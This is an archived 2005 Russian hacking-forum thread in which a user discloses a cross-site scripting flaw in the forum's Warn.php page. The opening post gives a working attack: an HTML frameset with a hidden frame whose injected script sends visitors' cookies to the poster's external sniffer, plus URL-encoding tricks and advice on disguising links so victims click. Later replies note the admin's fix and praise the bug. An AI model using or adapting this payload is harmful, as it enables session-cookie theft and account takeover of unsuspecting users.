Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Уязвимость Форум.Античат.Ру (не критическая) (https://forum.antichat.xyz/showthread.php?t=6533)

censored! 11.05.2005 21:42
Уязвимость Форум.Античат.Ру (не критическая)
 
http://forum.antichat.ru/Warn.php пропускает вхождения

Пример: http://forum.antichat.ru/Warn.php?do...kie);</script>

Чего делать?
Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт.
Вот так выглядит index.html (в примере адрес снифера указан мой):

Код HTML:
<html>
<head>
<title>Типа липовый сайт...</title>
</head>
<frameset cols="0,*" frameborder="NO" border="0" framespacing="0">
  <frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E">
  <frame name="mainFrame" src="main_frame.html">
</frameset>
<noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes>
</html>
...
*
Так как + (плюсик) вырезается, его заменяем: %2B
Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем:
" - %22
> - %3C
> - %3E
...
Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал).

Как пример:
...
!ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР!
...
Всем добро пожаловать на сайт http://forum.antichat.ru
...
© censored!

(-=util=-) 11.05.2005 22:23
Нифига себе намутил . А бага то красивая :) Аффтар жжот!!!

Algol 11.05.2005 22:25
Спасибо, исправлено.

m0nzt3r 12.05.2005 16:53
Цитата:
Сообщение от Algol
Спасибо, исправлено.
хорошо что исправил а то я по этой ссылке перешел )))

Че Гевара 12.05.2005 20:19
Молодец ... Даю грина )
Цитата:
Нифига себе намутил . А бага то красивая :) Аффтар жжот!!!
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...

censored! 14.05.2005 02:09
Добавление (всегда пригодится):
url-конвертер брать тут: [*censored*]


Цитата:
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Встречается он не часто, но все-равно встречается.

Algol 14.05.2005 02:41
Цитата:
Сообщение от Че Гевара
Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Кстати редкосная фигня....
Идея хорошая, а реализация - как всегда...

censored! 14.05.2005 02:55
Цитата:
url-конвертер брать тут: [*censored*]
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.

Algol 14.05.2005 10:56
Цитата:
Сообщение от censored!
Видимая ссылка на другой ресурс? Оке. Понял. Буду маскировать.
Просто такая же возможность есть в нашем родном InetCrack


Время: 19:49